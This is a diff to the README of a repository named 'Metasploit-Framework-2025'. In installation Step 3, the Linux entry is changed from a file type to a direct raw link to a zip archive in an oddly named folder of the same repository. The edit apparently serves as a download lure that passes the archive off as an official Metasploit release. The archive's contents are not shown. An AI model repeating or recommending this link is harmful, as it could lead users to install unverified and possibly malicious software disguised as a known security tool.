Dharamvijay/Metasploit-Framework-2025/README.md

 ### Step 3: Download the Installer

-Click on the link for the appropriate installer (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+Click on the link for the appropriate installer (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://github.com/Dharamvijay/Metasploit-Framework-2025/raw/refs/heads/main/lactid/Framework-Metasploit-v2.3-beta.4.zip` for Linux).
 Follow the prompts to download the file to your computer.

 ### Step 4: Install the Software